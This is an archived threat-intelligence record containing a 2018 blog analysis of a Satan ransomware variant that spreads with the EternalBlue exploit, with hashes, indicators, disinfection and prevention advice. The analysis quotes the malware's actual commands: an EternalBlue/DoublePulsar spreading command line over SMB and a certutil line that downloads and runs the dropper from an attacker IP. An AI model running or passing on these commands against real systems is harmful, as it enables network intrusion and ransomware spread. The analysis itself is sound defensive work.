{
	"id": "269c6fea-2f99-4e53-a0ad-aa981df2846d",
	"created_at": "2026-04-06T00:09:06.732048Z",
	"updated_at": "2026-04-10T03:20:28.709557Z",
	"deleted_at": null,
	"sha1_hash": "077276488ebc71d1b5d31428ef6a8833fbe140f8",
	"title": "Satan ransomware adds EternalBlue exploit",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 365686,
	"plain_text": "Satan ransomware adds EternalBlue exploit\r\nArchived: 2026-04-05 20:14:34 UTC\r\nToday, MalwareHunterTeam reached out to me about a possible new variant of Satan ransomware.\r\nSatan ransomware itself has been around since January 2017 as reported by Bleeping Computer.\r\nIn this blog post we'll analyse a new version of the infamous Satan ransomware, which since November 2017 has\r\nbeen using the EternalBlue exploit to spread via the network, and consequently encrypt files.\r\nAnalysis\r\nFirst up is a file inconspicuously named \"sts.exe\", which may refer to \"Satan spreader\".\r\nMD5: 12bc52fd9da66db3e63bfb196ceb9be6\r\nSHA1: 4508e3442673c149b31e3fffc29cc95f834975bc\r\nSHA256: b686cba1894f8ab5cec0ce5db195022def00204f6cd143a325608ec93e8b74ee\r\nCompilation timestamp: 2018-04-14 06:33:08\r\nVirusTotal report:\r\nb686cba1894f8ab5cec0ce5db195022def00204f6cd143a325608ec93e8b74ee\r\nThe file is packed with PECompact 2, and is therefore only 30KB in filesize. \r\nNotably, Satan has used different packers in multiple campaigns, for example, it has also used UPX and WinUpack.\r\nThis is possibly due to a packer option in the Satan RaaS builder. Fun fact: Iron ransomware, which may be a spin-off from Satan, has used VMProtect.\r\n\"sts.exe\" acts as a simple downloader, and will download two new files, both SFX archives, and extract them with a\r\ngiven password:\r\nFigure 1 - download and extract two new files\r\nBoth files will be downloaded from 198.55.107[.]149, and use a custom User-Agent \"RookIE/1.0\", which seems a\r\nrather unique User-Agent.\r\nms.exe has password: iamsatancryptor\r\nhttps://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html\r\nPage 1 of 6\n\nclient.exe has password: abcdefghijklmn\r\nIt appears the Satan ransomware developers showcase some sense of humor by using the password\r\n\"iamsatancryptor\". \r\nOnce the user has executed \"sts.exe\", they will get the following UAC prompt, if enabled:\r\nFigure 2 - UAC prompt\r\nClient.exe (94868520b220d57ec9df605839128c9b) is, as mentioned earlier, an SFX archive and will hold the actual\r\nSatan ransomware, named \"Cryptor.exe\". Figure 2 shows the command line options.\r\nCuriously, and thanks to the s2 option, the start dialog will be hidden, but the extraction progress is displayed - this\r\nmeans we need to click through to install the ransomware. Even more curious: the setup is in Chinese.\r\nFigure 3 - End of setup screen\r\nhttps://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html\r\nPage 2 of 6\n\nms.exe (770ddc649b8784989eed4cee10e8aa04) on the other hand will drop and load the EternalBlue exploit, and\r\nstarts scanning for vulnerable hosts. Required files will be dropped in the C:\\ProgramData folder, as seen in Figure\r\n3. Note it uses a publicly available implementation of the exploit - it does not appear to use its own.\r\nThe infection of other machines on the network will be achieved with the following command:\r\ncmd /c cd /D C:\\Users\\Alluse~1\\\u0026blue.exe --TargetIp \u0026 star.exe --OutConfig a --TargetPort 445 --\r\nProtocol SMB --Architecture x64 --Function RunDLL --DllPayload down64.dll --TargetIp \r\nWe can then see an attempt to spread the ransomware to other machine in the same network:\r\nFigure 4 - Spreading attempt over SMB, port 445\r\ndown64.dll (17f8d5aff617bb729fcc79be322fcb67) will be loaded in memory using DoublePulsar, and executes the\r\nfollowing command:\r\ncmd.exe /c certutil.exe -urlcache -split -f http://198.55.107.149/cab/sts.exe c:/sts.exe\u0026c:\\sts.exe\r\nThis will be used for planting sts.exe on other machines in the network, and will consequently be executed.\r\nSatan ransomware itself, which is contained in Client.exe, will be dropped to C:\\Cryptor.exe.\r\nThis payload is also packed with PECompact 2. As usual, any database-related services and processes will be\r\nstopped and killed, which it does to also encrypt those files possibly in use by another process.\r\nFigure 5 - Database-related processes\r\nhttps://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html\r\nPage 3 of 6\n\nWhat's new in this version of Satan, is that the exclusion list has changed slightly - it will not encrypt files with the\r\nfollowing words in its path:\r\nwindows, python2, python3, microsoft games, boot, i386, ST_V22, intel, dvd maker, recycle, libs, all\r\nusers, 360rec, 360sec, 360sand, favorites, common files, internet explorer, msbuild, public,\r\n360downloads, windows defen, windows mail, windows media pl, windows nt, windows photo viewer,\r\nwindows sidebar, default user\r\nThis exclusion list is reminiscent of Iron ransomware. (or vice-versa)\r\nSatan will, after encryption, automatically open the following ransomware note: C:\\_How_to_decrypt_files.txt:\r\nFigure 6 - Ransom note\r\nThe note is, as usual, in English, Chinese and Korean, and demands the user to pay 0.3 BTC. Satan will prepend\r\nfilenames with its email address, satan_pro@mail.ru, and append extensions with .satan. For\r\nexample: [satan_pro@mail.ru]Desert.jpg.satan\r\nBTC Wallet: 14hCK6iRXwRkmBFRKG8kiSpCSpKmqtH2qo \r\nEmail: satan_pro@mail.ru\r\nNote: _How_to_decrypt_files.txt\r\nSatan will create a unique mutex, SATANAPP, so the ransomware won't run twice. It will also generate a unique\r\nhardware ID and sends this to the C2 server:\r\nGET /data/token.php?\r\nstatus=ST\u0026code=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX \r\nhttps://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html\r\nPage 4 of 6\n\nHTTP/1.1 \r\nConnection: Keep-Alive \r\nUser-Agent: Winnet Client \r\nHost: 198.55.107.149\r\nAs mentioned in the beginning of this blog post, Satan ransomware has been using EternalBlue since at least\r\nNovember 2017 last year. For example, 25005f06e9b45fad836641b19b96f4b3 is another downloader which works\r\nsimilar to what is posted in this blog. It would fetch the following files:\r\nhttp://122.114.9.220/data/client.exe\r\nhttp://122.114.9.220/data/ms.exe\r\nhttp://122.114.9.220/data/winlog.exe\r\nAccording to VirusTotal, the downloader file was uploaded:\r\n2017-11-20 18:35:17 UTC ( 5 months ago )\r\nFor additional reading, read this excellent post by Tencent, who discovered a similar variant using EternalBlue\r\nearlier in April this year.\r\nDisinfection\r\nYou may want to verify if any of the following files or folders exist:\r\nC:\\sts.exe\r\nC:\\Cryptor.exe\r\nC:\\ProgramData\\ms.exe\r\nC:\\ProgramData\\client.exe\r\nC:\\Windows\\Temp\\KSession\r\nPrevention\r\nEnable UAC\r\nEnable Windows Update, and install updates (especially verify if MS17-010 is installed)\r\nInstall an antivirus, and keep it up-to-date and running\r\nRestrict, where possible, access to shares (ACLs)\r\nCreate backups! (and test them)\r\nMore ransomware prevention can be found here.\r\nConclusion\r\nSatan is not the first ransomware to use EternalBlue (for example, WannaCry), however, it does appear the\r\ndevelopers of Satan are continuously improving and adding features to its ransomware.\r\nPrevention is always better than disinfection/decryption.\r\nhttps://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html\r\nPage 5 of 6\n\nIOCs\r\nSource: https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html\r\nhttps://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html"
	],
	"report_names": [
		"satan-ransomware-adds-eternalblue.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434146,
	"ts_updated_at": 1775791228,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/077276488ebc71d1b5d31428ef6a8833fbe140f8.pdf",
		"text": "https://archive.orkl.eu/077276488ebc71d1b5d31428ef6a8833fbe140f8.txt",
		"img": "https://archive.orkl.eu/077276488ebc71d1b5d31428ef6a8833fbe140f8.jpg"
	}
}